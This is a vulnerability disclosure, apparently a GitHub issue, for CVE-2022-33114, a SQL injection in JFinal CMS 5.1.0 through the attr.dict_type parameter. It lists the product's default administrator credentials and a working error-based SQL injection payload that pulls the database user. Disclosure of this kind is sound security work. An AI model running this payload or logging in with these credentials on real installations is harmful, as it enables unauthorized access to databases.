Headline
CVE-2022-33114: SQL injection vulnerability exists in JFinal CMS 5.1.0 · Issue #38 · jflyfox/jfinal_cms
Jfinal CMS v5.1.0 was discovered to contain a SQL injection vulnerability via the attrVal parameter at /jfinal_cms/system/dict/list.
Vulnerability Analysis
The vulnerability appears in lines 23-28 of the com.jflyfox.system.dict.DictController.java
The attrVal parameter is the attr.dict_type parameter passed from the front end
So you can construct payload to exploit this vulnerability
Exploit
Maven Startup Environment
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account password is admin:admin123
Injection parameters: attr.dict_type
payload:’ OR (SELECT 2896 FROM(SELECT COUNT(),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–+
Sqlmap: